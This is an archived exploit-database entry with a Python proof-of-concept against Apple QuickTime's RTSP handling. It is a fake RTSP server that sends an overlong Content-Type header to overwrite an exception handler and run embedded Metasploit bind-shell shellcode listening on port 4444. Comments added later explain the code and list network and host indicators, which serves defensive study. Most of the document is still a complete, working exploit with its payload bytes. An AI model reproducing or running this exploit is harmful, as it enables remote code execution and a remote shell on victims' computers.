aquick-universal.txt

2007-11-27T00:00:00
ID PACKETSTORM:61218
Type packetstorm
Reporter Mati Aharoni
Modified 2007-11-27T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
##########################################################################  
# http://www.offensive-security.com  
# This exploit is completely "Universal" .... It has also been modded to work   
# via url redirection ...   
# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....  
# re-edited by muts and javaguru1999 to spite Symantec  
# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html  
# there IS NO SPOON!  
##########################################################################   
# "With Internet Explorer versions 6 and 7, and the Safari 3 beta,   
# the attack appears to be prevented because standard buffer overflow   
# prevention processes act before any damage can be done, Florio wrote.   
# With Firefox, the QuickTime RTSP response is unmoderated. As a result,   
# the exploit works against Firefox if QuickTime is the default multimedia player,   
# according to Florio."  
##########################################################################  
# Calling Quicktime via URL kicks in an Extra Exception Handler,   
# of which we have no control over.  
# By making the buffer larger than the original exploit, we can overwrite   
# the last exception handler, and regain control over execution.  
# This is indeed an evil exploit - muhaha.  
##########################################################################  
  
from socket import *

# Overall flow (Python 2 syntax: print statement, raw_input): build one RTSP
# "200 OK" response whose Content-Type header value is about 31 KB long,
# listen on TCP/554, hand that response to the first client that connects,
# wait for a keypress, then close both sockets. The script serves a single
# connection and exits; there is no accept loop.

# Response template. The two %-placeholders are filled near the bottom of the
# script: Content-Type receives `tmp` (the oversized value the author marks
# as the overflow field) and Content-Length receives len(body).
# Detection note: a genuine DESCRIBE reply carries a short media type in
# Content-Type (typically application/sdp), so a multi-kilobyte Content-Type
# value on a TCP/554 response is a clear network-level indicator of this PoC.
# The literal "Date: 0x00 :P" value is likewise non-standard and constant.
header = (
'RTSP/1.0 200 OK\r\n'
'CSeq: 1\r\n'
'Date: 0x00 :P\r\n'
'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'
'Content-Type: %s\r\n' # <-- overflow: filled with the oversized `tmp` value below
'Content-Length: %d\r\n'
'\r\n')

# SDP body that follows the header. Its fixed strings (the s= line, the
# a=tool:ciamciaramcia attribute, the a=x-qt-text-nam value) never vary, so
# they are usable as content signatures for this particular PoC.
body = (
'v=0\r\n'
'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'i=1.mp3\r\n'
't=0 0\r\n'
'a=tool:ciamciaramcia\r\n'
'a=type:broadcast\r\n'
'a=control:*\r\n'
'a=range:npt=0-213.077\r\n'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'a=x-qt-text-inf:1.mp3\r\n'
'm=audio 0 RTP/AVP 14\r\n'
'c=IN IP4 0.0.0.0\r\n'
'a=control:track1\r\n'
)

# ExitProcess shellcode will kill IE, but keep the shell open

# Per the embedded generator comment, this is a Metasploit win32_bind payload
# (EXITFUNC=process, LPORT=4444, 696 bytes, Alpha2-encoded). The bytes are
# reproduced exactly as published. Host-side indicator: a successful run
# leaves an unexpected listener on TCP/4444 on the victim host; the Alpha2
# encoding keeps the payload within the printable-ASCII range, which is why
# it is mostly 0x30-0x7a bytes rather than an obvious binary blob.
shellcode =(# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61"
"\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53"
"\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e"
"\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46"
"\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50"
"\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b"
"\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b"
"\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69"
"\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36"
"\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44"
"\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56"
"\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74"
"\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53"
"\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a"
"\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71"
"\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78"
"\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f"
"\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32"
"\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c"
"\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33"
"\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51"
"\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51"
"\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41"
"\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e"
"\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39"
"\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b"
"\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e"
"\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38"
"\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31"
"\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46"
"\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30"
"\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73"
"\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e"
"\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32"
"\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30"
"\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e"
"\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58"
"\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41"
"\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b"
"\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b"
"\x4f\x48\x56\x69\x6f\x6a\x70\x42")

# Layout of the Content-Type value, as described by the author's own
# comments on each line: 987 filler bytes, three 4-byte fields (a short jump
# and two addresses the author labels as pop/pop/ret for QuickTime 7.2 and
# 7.3), a 92-byte run of 0x90, the payload, then 0x41 padding so that payload
# plus padding is exactly 30,000 bytes. Total: 987 + 12 + 92 + 30000 = 31,091
# bytes, which is the size to expect in the Content-Type header on the wire.
tmp = "A" * 987
tmp +="\xeb\x20\x90\x90" # short jump for 7.2
tmp +="\xeb\x20\x9c\x66" # 669c20eb | funky magic - This is both a pop pop ret for 7.2, and a Short jump for 7.3
tmp +="\x4e\x28\x86\x66" # 6686284e | pop pop ret for 7.3
tmp += "\x90" * 92
tmp += shellcode
tmp += "\x41" * int(30000-len(shellcode)) # Play with this buffer if you still get exceptions. (int() is redundant here: both operands are already int.)

# Fill the template. `header` is a single str (adjacent string literals
# concatenate), so %= formats it in place. Note that Content-Length counts
# only the SDP body, not the oversized header value.
header %= (tmp, len(body))
# Complete response exactly as it is written to the socket.
evil = header + body

# Listener: binds all interfaces on TCP/554 (a privileged port, so this
# typically needs elevated rights on Unix-like hosts), accepts exactly one
# connection, reads and discards up to 1024 bytes of whatever the client sent
# (presumably its RTSP request -- the contents are never inspected), then
# writes the whole response with a single send() call.
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evil)
# Block until Enter is pressed so the connection is held open; then tear down
# both the accepted socket and the listening socket.
raw_input("[+] Done, press enter to quit")
c.close()
s.close()

# EoF
`